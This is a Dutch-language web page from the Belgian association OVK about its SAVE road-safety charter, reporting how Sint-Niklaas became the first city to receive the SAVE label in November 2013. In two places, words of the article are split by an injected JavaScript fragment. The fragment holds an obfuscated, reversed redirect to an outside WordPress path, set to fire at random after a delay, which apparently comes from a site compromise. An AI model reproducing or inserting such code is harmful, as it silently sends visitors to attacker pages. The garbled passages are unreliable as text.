Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Sint-Niklaas ontvangt SAVE-label

Sint-Niklaas kreeg op 20 november 2013 het SAVE-label overhandigd. Hiermee werden ze de eerste stad die het SAVE-label in ontvangst mocht nemen.
Verkeersveiligheid voor (schoolgaande) kinderen en jongeren is een belangrijke parameter voor de leefbaarheid van een stad. In 2012 hield de stad een bevraging over kindvriendelijkheid, waarbij de meerderheid van de kinderen en jongeren alsook de ouders uit Sint-Niklaas aangaven dat  ze de stad soms als onveilig ervaarden. Daarom werd mobiliteit als één van de prioriteiten gekozen voor de kindvriendelijke stad.
De uitreiking van het SAVE-label kaderde dus in de ambitie de stad kindvriendelijk(er) te maken. Daarom vond de uitreiking plaats op de internationale Dag van de Rechten van het Kind.
De leerlingen van het vierde leerjaar begonnen de dag met een wandeling waar ze de genodigden begeleidden langsheen de schoolomgeving. Ze gaven de aanwezigen een beeld van de plaatsen die zij kindvriendelijk en vooral verkeersveilig noemden, maar gaven ook punten aan die volgens hen nog aangepakt kunnen worden in de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst.
In zijn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toespraak gaf de burgemeester te kennen het niet bij één SAVE-jaar te houden. Verkeersveiligheid is een thema waar je aan moet blijven werken, en dat zal de stad Sint-Niklaas dan ook doen.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be